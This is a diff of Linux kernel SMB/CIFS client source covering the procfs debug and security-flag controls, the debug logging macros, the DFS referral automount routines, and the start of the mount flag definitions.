++	proc_create("smbd_receive_credit_max", 0644, proc_fs_cifs,
++		&cifs_smbd_receive_credit_max_proc_fops);
++#endif
++}
++
++void
++cifs_proc_clean(void)
++{
++	if (proc_fs_cifs == NULL)
++		return;
++
++	remove_proc_entry("DebugData", proc_fs_cifs);
++	remove_proc_entry("open_files", proc_fs_cifs);
++	remove_proc_entry("cifsFYI", proc_fs_cifs);
++	remove_proc_entry("traceSMB", proc_fs_cifs);
++	remove_proc_entry("Stats", proc_fs_cifs);
++	remove_proc_entry("SecurityFlags", proc_fs_cifs);
++	remove_proc_entry("LinuxExtensionsEnabled", proc_fs_cifs);
++	remove_proc_entry("LookupCacheEnabled", proc_fs_cifs);
++	remove_proc_entry("mount_params", proc_fs_cifs);
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	remove_proc_entry("dfscache", proc_fs_cifs);
++#endif
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	remove_proc_entry("rdma_readwrite_threshold", proc_fs_cifs);
++	remove_proc_entry("smbd_max_frmr_depth", proc_fs_cifs);
++	remove_proc_entry("smbd_keep_alive_interval", proc_fs_cifs);
++	remove_proc_entry("smbd_max_receive_size", proc_fs_cifs);
++	remove_proc_entry("smbd_max_fragmented_recv_size", proc_fs_cifs);
++	remove_proc_entry("smbd_max_send_size", proc_fs_cifs);
++	remove_proc_entry("smbd_send_credit_target", proc_fs_cifs);
++	remove_proc_entry("smbd_receive_credit_max", proc_fs_cifs);
++#endif
++	remove_proc_entry("fs/cifs", NULL);
++}
++
++static int cifsFYI_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", cifsFYI);
++	return 0;
++}
++
++static int cifsFYI_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifsFYI_proc_show, NULL);
++}
++
++static ssize_t cifsFYI_proc_write(struct file *file, const char __user *buffer,
++		size_t count, loff_t *ppos)
++{
++	char c[2] = { '\0' };
++	bool bv;
++	int rc;
++
++	rc = get_user(c[0], buffer);
++	if (rc)
++		return rc;
++	if (strtobool(c, &bv) == 0)
++		cifsFYI = bv;
++	else if ((c[0] > '1') && (c[0] <= '9'))
++		cifsFYI = (int) (c[0] - '0'); /* see cifs_debug.h for meanings */
++	else
++		return -EINVAL;
++
++	return count;
++}
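++
++/*
++ * Usage sketch (from userspace):
++ *	echo 1 > /proc/fs/cifs/cifsFYI	(enable FYI logging)
++ *	echo 7 > /proc/fs/cifs/cifsFYI	(numeric level, see cifs_debug.h)
++ *	echo 0 > /proc/fs/cifs/cifsFYI	(disable)
++ */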
++
++static const struct proc_ops cifsFYI_proc_ops = {
++	.proc_open	= cifsFYI_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifsFYI_proc_write,
++};
++
++static int cifs_linux_ext_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", linuxExtEnabled);
++	return 0;
++}
++
++static int cifs_linux_ext_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_linux_ext_proc_show, NULL);
++}
++
++static ssize_t cifs_linux_ext_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	int rc;
++
++	rc = kstrtobool_from_user(buffer, count, &linuxExtEnabled);
++	if (rc)
++		return rc;
++
++	return count;
++}
++
++static const struct proc_ops cifs_linux_ext_proc_ops = {
++	.proc_open	= cifs_linux_ext_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_linux_ext_proc_write,
++};
++
++static int cifs_lookup_cache_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", lookupCacheEnabled);
++	return 0;
++}
++
++static int cifs_lookup_cache_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_lookup_cache_proc_show, NULL);
++}
++
++static ssize_t cifs_lookup_cache_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	int rc;
++
++	rc = kstrtobool_from_user(buffer, count, &lookupCacheEnabled);
++	if (rc)
++		return rc;
++
++	return count;
++}
++
++static const struct proc_ops cifs_lookup_cache_proc_ops = {
++	.proc_open	= cifs_lookup_cache_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_lookup_cache_proc_write,
++};
++
++static int traceSMB_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", traceSMB);
++	return 0;
++}
++
++static int traceSMB_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, traceSMB_proc_show, NULL);
++}
++
++static ssize_t traceSMB_proc_write(struct file *file, const char __user *buffer,
++		size_t count, loff_t *ppos)
++{
++	int rc;
++
++	rc = kstrtobool_from_user(buffer, count, &traceSMB);
++	if (rc)
++		return rc;
++
++	return count;
++}
++
++static const struct proc_ops traceSMB_proc_ops = {
++	.proc_open	= traceSMB_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= traceSMB_proc_write,
++};
++
++static int cifs_security_flags_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "0x%x\n", global_secflags);
++	return 0;
++}
++
++static int cifs_security_flags_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_security_flags_proc_show, NULL);
++}
++
++/*
++ * Ensure that if someone sets a MUST flag, we disable all other MAY
++ * flags except the ones corresponding to that MUST flag. If there are
++ * multiple MUST flags, prefer the more secure ones.
++ */
++static void
++cifs_security_flags_handle_must_flags(unsigned int *flags)
++{
++	unsigned int signflags = *flags & CIFSSEC_MUST_SIGN;
++
++	if ((*flags & CIFSSEC_MUST_KRB5) == CIFSSEC_MUST_KRB5)
++		*flags = CIFSSEC_MUST_KRB5;
++	else if ((*flags & CIFSSEC_MUST_NTLMSSP) == CIFSSEC_MUST_NTLMSSP)
++		*flags = CIFSSEC_MUST_NTLMSSP;
++	else if ((*flags & CIFSSEC_MUST_NTLMV2) == CIFSSEC_MUST_NTLMV2)
++		*flags = CIFSSEC_MUST_NTLMV2;
++
++	*flags |= signflags;
++}
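++
++/*
++ * For example (illustrative): if both CIFSSEC_MUST_KRB5 and
++ * CIFSSEC_MUST_NTLMV2 are set, the flags collapse to CIFSSEC_MUST_KRB5,
++ * preferring the more secure mechanism; any CIFSSEC_MUST_SIGN bits are
++ * preserved across the collapse.
++ */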
++
++static ssize_t cifs_security_flags_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	int rc;
++	unsigned int flags;
++	char flags_string[12];
++	bool bv;
++
++	if ((count < 1) || (count > 11))
++		return -EINVAL;
++
++	memset(flags_string, 0, 12);
++
++	if (copy_from_user(flags_string, buffer, count))
++		return -EFAULT;
++
++	if (count < 3) {
++		/* single char or single char followed by null */
++		if (strtobool(flags_string, &bv) == 0) {
++			global_secflags = bv ? CIFSSEC_MAX : CIFSSEC_DEF;
++			return count;
++		} else if (!isdigit(flags_string[0])) {
++			cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
++					flags_string);
++			return -EINVAL;
++		}
++	}
++
++	/* else we have a number */
++	rc = kstrtouint(flags_string, 0, &flags);
++	if (rc) {
++		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
++				flags_string);
++		return rc;
++	}
++
++	cifs_dbg(FYI, "sec flags 0x%x\n", flags);
++
++	if (flags == 0)  {
++		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n", flags_string);
++		return -EINVAL;
++	}
++
++	if (flags & ~CIFSSEC_MASK) {
++		cifs_dbg(VFS, "Unsupported security flags: 0x%x\n",
++			 flags & ~CIFSSEC_MASK);
++		return -EINVAL;
++	}
++
++	cifs_security_flags_handle_must_flags(&flags);
++
++	/* flags look ok - update the global security flags for cifs module */
++	global_secflags = flags;
++	if (global_secflags & CIFSSEC_MUST_SIGN) {
++		/* requiring signing implies signing is allowed */
++		global_secflags |= CIFSSEC_MAY_SIGN;
++		cifs_dbg(FYI, "packet signing now required\n");
++	} else if ((global_secflags & CIFSSEC_MAY_SIGN) == 0) {
++		cifs_dbg(FYI, "packet signing disabled\n");
++	}
++	/* BB should we turn on MAY flags for other MUST options? */
++	return count;
++}
++
++static const struct proc_ops cifs_security_flags_proc_ops = {
++	.proc_open	= cifs_security_flags_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_security_flags_proc_write,
++};
++
++/* To make debugging easier, it can help to show the mount params */
++static int cifs_mount_params_proc_show(struct seq_file *m, void *v)
++{
++	const struct fs_parameter_spec *p;
++	const char *type;
++
++	for (p = smb3_fs_parameters; p->name; p++) {
++		/* cannot use switch with pointers... */
++		if (!p->type) {
++			if (p->flags == fs_param_neg_with_no)
++				type = "noflag";
++			else
++				type = "flag";
++		} else if (p->type == fs_param_is_bool)
++			type = "bool";
++		else if (p->type == fs_param_is_u32)
++			type = "u32";
++		else if (p->type == fs_param_is_u64)
++			type = "u64";
++		else if (p->type == fs_param_is_string)
++			type = "string";
++		else
++			type = "unknown";
++
++		seq_printf(m, "%s:%s\n", p->name, type);
++	}
++
++	return 0;
++}
++
++static int cifs_mount_params_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_mount_params_proc_show, NULL);
++}
++
++static const struct proc_ops cifs_mount_params_proc_ops = {
++	.proc_open	= cifs_mount_params_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	/* No need for write for now */
++	/* .proc_write	= cifs_mount_params_proc_write, */
++};
++
++#else
++inline void cifs_proc_init(void)
++{
++}
++
++inline void cifs_proc_clean(void)
++{
++}
++#endif /* PROC_FS */
+diff --git a/fs/smb/client/cifs_debug.h b/fs/smb/client/cifs_debug.h
+new file mode 100644
+index 0000000000000..ce5cfd236fdb8
+--- /dev/null
++++ b/fs/smb/client/cifs_debug.h
+@@ -0,0 +1,160 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2002
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ */
++
++#ifndef _H_CIFS_DEBUG
++#define _H_CIFS_DEBUG
++
++#ifdef pr_fmt
++#undef pr_fmt
++#endif
++
++#define pr_fmt(fmt) "CIFS: " fmt
++
++void cifs_dump_mem(char *label, void *data, int length);
++void cifs_dump_detail(void *buf, struct TCP_Server_Info *ptcp_info);
++void cifs_dump_mids(struct TCP_Server_Info *);
++extern bool traceSMB;		/* flag which enables the function below */
++void dump_smb(void *, int);
++#define CIFS_INFO	0x01
++#define CIFS_RC		0x02
++#define CIFS_TIMER	0x04
++
++#define VFS 1
++#define FYI 2
++extern int cifsFYI;
++#ifdef CONFIG_CIFS_DEBUG2
++#define NOISY 4
++#else
++#define NOISY 0
++#endif
++#define ONCE 8
++
++/*
++ *	debug ON
++ *	--------
++ */
++#ifdef CONFIG_CIFS_DEBUG
++
++/*
++ * When adding tracepoints and debug messages we have various choices.
++ * Some considerations:
++ *
++ * Use cifs_dbg(VFS, ...) for things we always want logged, and the user to see
++ *     cifs_info(...) slightly less important, admin can filter via loglevel > 6
++ *     cifs_dbg(FYI, ...) minor debugging messages, off by default
++ *     trace_smb3_*  ftrace functions are preferred for complex debug messages
++ *                 intended for developers or experienced admins, off by default
++ */
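++
++/*
++ * Example usage (illustrative):
++ *
++ *	cifs_dbg(FYI, "found a cached file handle by dentry\n");
++ *	cifs_dbg(VFS, "Dump pending requests:\n");
++ */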
++
++/* Information level messages, minor events */
++#define cifs_info_func(ratefunc, fmt, ...)				\
++	pr_info_ ## ratefunc(fmt, ##__VA_ARGS__)
++
++#define cifs_info(fmt, ...)						\
++	cifs_info_func(ratelimited, fmt, ##__VA_ARGS__)
++
++/* information message: e.g., configuration, major event */
++#define cifs_dbg_func(ratefunc, type, fmt, ...)				\
++do {									\
++	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
++		pr_debug_ ## ratefunc("%s: " fmt,			\
++				      __FILE__, ##__VA_ARGS__);		\
++	} else if ((type) & VFS) {					\
++		pr_err_ ## ratefunc("VFS: " fmt, ##__VA_ARGS__);	\
++	} else if ((type) & NOISY && (NOISY != 0)) {			\
++		pr_debug_ ## ratefunc(fmt, ##__VA_ARGS__);		\
++	}								\
++} while (0)
++
++#define cifs_dbg(type, fmt, ...)					\
++do {									\
++	if ((type) & ONCE)						\
++		cifs_dbg_func(once, type, fmt, ##__VA_ARGS__);		\
++	else								\
++		cifs_dbg_func(ratelimited, type, fmt, ##__VA_ARGS__);	\
++} while (0)
++
++#define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
++do {									\
++	spin_lock(&server->srv_lock);					\
++	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
++		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
++				      __FILE__, server->hostname,	\
++				      ##__VA_ARGS__);			\
++	} else if ((type) & VFS) {					\
++		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
++				    server->hostname, ##__VA_ARGS__);	\
++	} else if ((type) & NOISY && (NOISY != 0)) {			\
++		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
++				      server->hostname, ##__VA_ARGS__);	\
++	}								\
++	spin_unlock(&server->srv_lock);					\
++} while (0)
++
++#define cifs_server_dbg(type, fmt, ...)					\
++do {									\
++	if ((type) & ONCE)						\
++		cifs_server_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
++	else								\
++		cifs_server_dbg_func(ratelimited, type, fmt,		\
++				     ##__VA_ARGS__);			\
++} while (0)
++
++#define cifs_tcon_dbg_func(ratefunc, type, fmt, ...)			\
++do {									\
++	const char *tn = "";						\
++	if (tcon && tcon->tree_name)					\
++		tn = tcon->tree_name;					\
++	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
++		pr_debug_ ## ratefunc("%s: %s "	fmt,			\
++				      __FILE__, tn, ##__VA_ARGS__);	\
++	} else if ((type) & VFS) {					\
++		pr_err_ ## ratefunc("VFS: %s " fmt, tn, ##__VA_ARGS__);	\
++	} else if ((type) & NOISY && (NOISY != 0)) {			\
++		pr_debug_ ## ratefunc("%s " fmt, tn, ##__VA_ARGS__);	\
++	}								\
++} while (0)
++
++#define cifs_tcon_dbg(type, fmt, ...)					\
++do {									\
++	if ((type) & ONCE)						\
++		cifs_tcon_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
++	else								\
++		cifs_tcon_dbg_func(ratelimited, type, fmt,		\
++				   ##__VA_ARGS__);			\
++} while (0)
++
++/*
++ *	debug OFF
++ *	---------
++ */
++#else		/* _CIFS_DEBUG */
++#define cifs_dbg(type, fmt, ...)					\
++do {									\
++	if (0)								\
++		pr_debug(fmt, ##__VA_ARGS__);				\
++} while (0)
++
++#define cifs_server_dbg(type, fmt, ...)					\
++do {									\
++	if (0)								\
++		pr_debug("\\\\%s " fmt,					\
++			 server->hostname, ##__VA_ARGS__);		\
++} while (0)
++
++#define cifs_tcon_dbg(type, fmt, ...)					\
++do {									\
++	if (0)								\
++		pr_debug("%s " fmt, tcon->tree_name, ##__VA_ARGS__);	\
++} while (0)
++
++#define cifs_info(fmt, ...)						\
++	pr_info(fmt, ##__VA_ARGS__)
++#endif
++
++#endif				/* _H_CIFS_DEBUG */
+diff --git a/fs/smb/client/cifs_dfs_ref.c b/fs/smb/client/cifs_dfs_ref.c
+new file mode 100644
+index 0000000000000..b0864da9ef434
+--- /dev/null
++++ b/fs/smb/client/cifs_dfs_ref.c
+@@ -0,0 +1,374 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Contains the CIFS DFS referral mounting routines used for handling
++ *   traversal via DFS junction point
++ *
++ *   Copyright (c) 2007 Igor Mammedov
++ *   Copyright (C) International Business Machines  Corp., 2008
++ *   Author(s): Igor Mammedov (niallain@gmail.com)
++ *		Steve French (sfrench@us.ibm.com)
++ */
++
++#include <linux/dcache.h>
++#include <linux/mount.h>
++#include <linux/namei.h>
++#include <linux/slab.h>
++#include <linux/vfs.h>
++#include <linux/fs.h>
++#include <linux/inet.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifsfs.h"
++#include "dns_resolve.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "dfs_cache.h"
++#include "fs_context.h"
++
++static LIST_HEAD(cifs_dfs_automount_list);
++
++static void cifs_dfs_expire_automounts(struct work_struct *work);
++static DECLARE_DELAYED_WORK(cifs_dfs_automount_task,
++			    cifs_dfs_expire_automounts);
++static int cifs_dfs_mountpoint_expiry_timeout = 500 * HZ;
++
++static void cifs_dfs_expire_automounts(struct work_struct *work)
++{
++	struct list_head *list = &cifs_dfs_automount_list;
++
++	mark_mounts_for_expiry(list);
++	if (!list_empty(list))
++		schedule_delayed_work(&cifs_dfs_automount_task,
++				      cifs_dfs_mountpoint_expiry_timeout);
++}
++
++void cifs_dfs_release_automount_timer(void)
++{
++	BUG_ON(!list_empty(&cifs_dfs_automount_list));
++	cancel_delayed_work_sync(&cifs_dfs_automount_task);
++}
++
++/**
++ * cifs_build_devname - build a devicename from a UNC and optional prepath
++ * @nodename:	pointer to UNC string
++ * @prepath:	pointer to prefixpath (or NULL if there isn't one)
++ *
++ * Build a new cifs devicename after chasing a DFS referral. Allocate a buffer
++ * big enough to hold the resulting string. Copy the UNC from the nodename, and
++ * concatenate the prepath onto the end of it if there is one.
++ *
++ * Returns a pointer to the built string, or an ERR_PTR. The caller is
++ * responsible for freeing the returned string.
++ */
++static char *
++cifs_build_devname(char *nodename, const char *prepath)
++{
++	size_t pplen;
++	size_t unclen;
++	char *dev;
++	char *pos;
++
++	/* skip over any preceding delimiters */
++	nodename += strspn(nodename, "\\");
++	if (!*nodename)
++		return ERR_PTR(-EINVAL);
++
++	/* get length of UNC and set pos to last char */
++	unclen = strlen(nodename);
++	pos = nodename + unclen - 1;
++
++	/* trim off any trailing delimiters */
++	while (*pos == '\\') {
++		--pos;
++		--unclen;
++	}
++
++	/* allocate a buffer:
++	 * +2 for preceding "//"
++	 * +1 for delimiter between UNC and prepath
++	 * +1 for trailing NULL
++	 */
++	pplen = prepath ? strlen(prepath) : 0;
++	dev = kmalloc(2 + unclen + 1 + pplen + 1, GFP_KERNEL);
++	if (!dev)
++		return ERR_PTR(-ENOMEM);
++
++	pos = dev;
++	/* add the initial "//" */
++	*pos = '/';
++	++pos;
++	*pos = '/';
++	++pos;
++
++	/* copy in the UNC portion from referral */
++	memcpy(pos, nodename, unclen);
++	pos += unclen;
++
++	/* copy the prefixpath remainder (if there is one) */
++	if (pplen) {
++		*pos = '/';
++		++pos;
++		memcpy(pos, prepath, pplen);
++		pos += pplen;
++	}
++
++	/* NULL terminator */
++	*pos = '\0';
++
++	convert_delimiter(dev, '/');
++	return dev;
++}
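++
++/*
++ * For example (illustrative): nodename "\\server\share" with prepath
++ * "sub/dir" yields "//server/share/sub/dir" once the leading delimiters
++ * are skipped and convert_delimiter() normalizes the separators.
++ */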
++
++/**
++ * cifs_compose_mount_options	-	creates mount options for referral
++ * @sb_mountdata:	parent/root DFS mount options (template)
++ * @fullpath:		full path in UNC format
++ * @ref:		optional server's referral
++ * @devname:		return the built cifs device name if the passed pointer is not NULL
++ *
++ * Creates mount options for a submount based on the template options in
++ * sb_mountdata, replacing the unc, ip and prefixpath options with the ones
++ * obtained from ref_unc.
++ *
++ * Returns: pointer to the new mount options or an ERR_PTR.
++ * The caller is responsible for freeing the returned value unless it is an
++ * error.
++ */
++char *cifs_compose_mount_options(const char *sb_mountdata,
++				 const char *fullpath,
++				 const struct dfs_info3_param *ref,
++				 char **devname)
++{
++	int rc;
++	char *name;
++	char *mountdata = NULL;
++	const char *prepath = NULL;
++	int md_len;
++	char *tkn_e;
++	char *srvIP = NULL;
++	char sep = ',';
++	int off, noff;
++
++	if (sb_mountdata == NULL)
++		return ERR_PTR(-EINVAL);
++
++	if (ref) {
++		if (WARN_ON_ONCE(!ref->node_name || ref->path_consumed < 0))
++			return ERR_PTR(-EINVAL);
++
++		if (strlen(fullpath) - ref->path_consumed) {
++			prepath = fullpath + ref->path_consumed;
++			/* skip initial delimiter */
++			if (*prepath == '/' || *prepath == '\\')
++				prepath++;
++		}
++
++		name = cifs_build_devname(ref->node_name, prepath);
++		if (IS_ERR(name)) {
++			rc = PTR_ERR(name);
++			name = NULL;
++			goto compose_mount_options_err;
++		}
++	} else {
++		name = cifs_build_devname((char *)fullpath, NULL);
++		if (IS_ERR(name)) {
++			rc = PTR_ERR(name);
++			name = NULL;
++			goto compose_mount_options_err;
++		}
++	}
++
++	rc = dns_resolve_server_name_to_ip(name, &srvIP, NULL);
++	if (rc < 0) {
++		cifs_dbg(FYI, "%s: Failed to resolve server part of %s to IP: %d\n",
++			 __func__, name, rc);
++		goto compose_mount_options_err;
++	}
++
++	/*
++	 * In most cases, we'll be building a shorter string than the original,
++	 * but we do have to assume that the address in the ip= option may be
++	 * much longer than the original. Add the max length of an address
++	 * string to the length of the original string to allow for worst case.
++	 */
++	md_len = strlen(sb_mountdata) + INET6_ADDRSTRLEN;
++	mountdata = kzalloc(md_len + sizeof("ip=") + 1, GFP_KERNEL);
++	if (mountdata == NULL) {
++		rc = -ENOMEM;
++		goto compose_mount_options_err;
++	}
++
++	/* copy all options except cruid, unc, ip and prefixpath */
++	off = 0;
++	if (strncmp(sb_mountdata, "sep=", 4) == 0) {
++		sep = sb_mountdata[4];
++		strncpy(mountdata, sb_mountdata, 5);
++		off += 5;
++	}
++
++	do {
++		tkn_e = strchr(sb_mountdata + off, sep);
++		if (tkn_e == NULL)
++			noff = strlen(sb_mountdata + off);
++		else
++			noff = tkn_e - (sb_mountdata + off) + 1;
++
++		if (strncasecmp(sb_mountdata + off, "cruid=", 6) == 0) {
++			off += noff;
++			continue;
++		}
++		if (strncasecmp(sb_mountdata + off, "unc=", 4) == 0) {
++			off += noff;
++			continue;
++		}
++		if (strncasecmp(sb_mountdata + off, "ip=", 3) == 0) {
++			off += noff;
++			continue;
++		}
++		if (strncasecmp(sb_mountdata + off, "prefixpath=", 11) == 0) {
++			off += noff;
++			continue;
++		}
++		strncat(mountdata, sb_mountdata + off, noff);
++		off += noff;
++	} while (tkn_e);
++	strcat(mountdata, sb_mountdata + off);
++	mountdata[md_len] = '\0';
++
++	/* copy new IP and ref share name */
++	if (mountdata[strlen(mountdata) - 1] != sep)
++		strncat(mountdata, &sep, 1);
++	strcat(mountdata, "ip=");
++	strcat(mountdata, srvIP);
++
++	if (devname)
++		*devname = name;
++	else
++		kfree(name);
++
++	/*cifs_dbg(FYI, "%s: parent mountdata: %s\n", __func__, sb_mountdata);*/
++	/*cifs_dbg(FYI, "%s: submount mountdata: %s\n", __func__, mountdata );*/
++
++compose_mount_options_out:
++	kfree(srvIP);
++	return mountdata;
++
++compose_mount_options_err:
++	kfree(mountdata);
++	mountdata = ERR_PTR(rc);
++	kfree(name);
++	goto compose_mount_options_out;
++}
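++
++/*
++ * Illustrative example (editorial, values made up): given template options
++ * "sep=,user=foo,unc=\\old\share" and a referral for \\new\share, the
++ * submount options become roughly "sep=,user=foo,ip=<resolved address>",
++ * while the device name "//new/share" is returned through @devname. The
++ * cruid, unc, ip and prefixpath tokens from the template are dropped and
++ * rebuilt as needed.
++ */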
++
++/**
++ * cifs_dfs_do_mount - mounts specified path using DFS full path
++ *
++ * Always pass down @fullpath to smb3_do_mount() so we can use the root server
++ * to perform failover in case we failed to connect to the first target in the
++ * referral.
++ *
++ * @mntpt:		directory entry for the path we are trying to automount
++ * @cifs_sb:		parent/root superblock
++ * @fullpath:		full path in UNC format
++ */
++static struct vfsmount *cifs_dfs_do_mount(struct dentry *mntpt,
++					  struct cifs_sb_info *cifs_sb,
++					  const char *fullpath)
++{
++	struct vfsmount *mnt;
++	char *mountdata;
++	char *devname;
++
++	devname = kstrdup(fullpath, GFP_KERNEL);
++	if (!devname)
++		return ERR_PTR(-ENOMEM);
++
++	convert_delimiter(devname, '/');
++
++	/* TODO: change to call fs_context_for_mount(), fill in context directly, call fc_mount */
++
++	/* See afs_mntpt_do_automount in fs/afs/mntpt.c for an example */
++
++	/* strip first '\' from fullpath */
++	mountdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options,
++					       fullpath + 1, NULL, NULL);
++	if (IS_ERR(mountdata)) {
++		kfree(devname);
++		return (struct vfsmount *)mountdata;
++	}
++
++	mnt = vfs_submount(mntpt, &cifs_fs_type, devname, mountdata);
++	kfree(mountdata);
++	kfree(devname);
++	return mnt;
++}
++
++/*
++ * Create a vfsmount that we can automount
++ */
++static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
++{
++	struct cifs_sb_info *cifs_sb;
++	void *page;
++	char *full_path;
++	struct vfsmount *mnt;
++
++	cifs_dbg(FYI, "in %s\n", __func__);
++	BUG_ON(IS_ROOT(mntpt));
++
++	/*
++	 * The MSDFS spec states that paths in DFS referral requests and
++	 * responses must be prefixed by a single '\' character instead of
++	 * the double backslashes usually used in the UNC. This function
++	 * gives us the latter, so we must adjust the result.
++	 */
++	cifs_sb = CIFS_SB(mntpt->d_sb);
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) {
++		mnt = ERR_PTR(-EREMOTE);
++		goto cdda_exit;
++	}
++
++	page = alloc_dentry_path();
++	/* always use tree name prefix */
++	full_path = build_path_from_dentry_optional_prefix(mntpt, page, true);
++	if (IS_ERR(full_path)) {
++		mnt = ERR_CAST(full_path);
++		goto free_full_path;
++	}
++
++	convert_delimiter(full_path, '\\');
++	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
++
++	mnt = cifs_dfs_do_mount(mntpt, cifs_sb, full_path);
++	cifs_dbg(FYI, "%s: cifs_dfs_do_mount:%s , mnt:%p\n", __func__, full_path + 1, mnt);
++
++free_full_path:
++	free_dentry_path(page);
++cdda_exit:
++	cifs_dbg(FYI, "leaving %s\n" , __func__);
++	return mnt;
++}
++
++/*
++ * Attempt to automount the referral
++ */
++struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	struct vfsmount *newmnt;
++
++	cifs_dbg(FYI, "in %s\n", __func__);
++
++	newmnt = cifs_dfs_do_automount(path->dentry);
++	if (IS_ERR(newmnt)) {
++		cifs_dbg(FYI, "leaving %s [automount failed]\n" , __func__);
++		return newmnt;
++	}
++
++	mntget(newmnt); /* prevent immediate expiration */
++	mnt_set_expiry(newmnt, &cifs_dfs_automount_list);
++	schedule_delayed_work(&cifs_dfs_automount_task,
++			      cifs_dfs_mountpoint_expiry_timeout);
++	cifs_dbg(FYI, "leaving %s [ok]\n" , __func__);
++	return newmnt;
++}
++
++const struct inode_operations cifs_dfs_referral_inode_operations = {
++};
+diff --git a/fs/smb/client/cifs_fs_sb.h b/fs/smb/client/cifs_fs_sb.h
+new file mode 100644
+index 0000000000000..013a4bd65280c
+--- /dev/null
++++ b/fs/smb/client/cifs_fs_sb.h
+@@ -0,0 +1,76 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2004
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/rbtree.h>
++
++#ifndef _CIFS_FS_SB_H
++#define _CIFS_FS_SB_H
++
++#include <linux/backing-dev.h>
++
++#define CIFS_MOUNT_NO_PERM      1 /* do not do client vfs_perm check */
++#define CIFS_MOUNT_SET_UID      2 /* set current's euid in create etc. */
++#define CIFS_MOUNT_SERVER_INUM  4 /* inode numbers from uniqueid from server  */
++#define CIFS_MOUNT_DIRECT_IO    8 /* do not write nor read through page cache */
++#define CIFS_MOUNT_NO_XATTR     0x10  /* if set - disable xattr support       */
++#define CIFS_MOUNT_MAP_SPECIAL_CHR 0x20 /* remap illegal chars in filenames   */
++#define CIFS_MOUNT_POSIX_PATHS  0x40  /* Negotiate posix pathnames if possible*/
++#define CIFS_MOUNT_UNX_EMUL     0x80  /* Network compat with SFUnix emulation */
++#define CIFS_MOUNT_NO_BRL       0x100 /* No sending byte range locks to srv   */
++#define CIFS_MOUNT_CIFS_ACL     0x200 /* send ACL requests to non-POSIX srv   */
++#define CIFS_MOUNT_OVERR_UID    0x400 /* override uid returned from server    */
++#define CIFS_MOUNT_OVERR_GID    0x800 /* override gid returned from server    */
++#define CIFS_MOUNT_DYNPERM      0x1000 /* allow in-memory only mode setting   */
++#define CIFS_MOUNT_NOPOSIXBRL   0x2000 /* mandatory not posix byte range lock */
++#define CIFS_MOUNT_NOSSYNC      0x4000 /* don't do slow SMBflush on every sync*/
++#define CIFS_MOUNT_FSCACHE	0x8000 /* local caching enabled */
++#define CIFS_MOUNT_MF_SYMLINKS	0x10000 /* Minshall+French Symlinks enabled */
++#define CIFS_MOUNT_MULTIUSER	0x20000 /* multiuser mount */
++#define CIFS_MOUNT_STRICT_IO	0x40000 /* strict cache mode */
++#define CIFS_MOUNT_RWPIDFORWARD	0x80000 /* use pid forwarding for rw */
++#define CIFS_MOUNT_POSIXACL	0x100000 /* mirror of SB_POSIXACL in mnt_cifs_flags */
++#define CIFS_MOUNT_CIFS_BACKUPUID 0x200000 /* backup intent bit for a user */
++#define CIFS_MOUNT_CIFS_BACKUPGID 0x400000 /* backup intent bit for a group */
++#define CIFS_MOUNT_MAP_SFM_CHR	0x800000 /* SFM/MAC mapping for illegal chars */
++#define CIFS_MOUNT_USE_PREFIX_PATH 0x1000000 /* make subpath with inaccessible
++					      * root mountable
++					      */
++#define CIFS_MOUNT_UID_FROM_ACL 0x2000000 /* try to get UID via special SID */
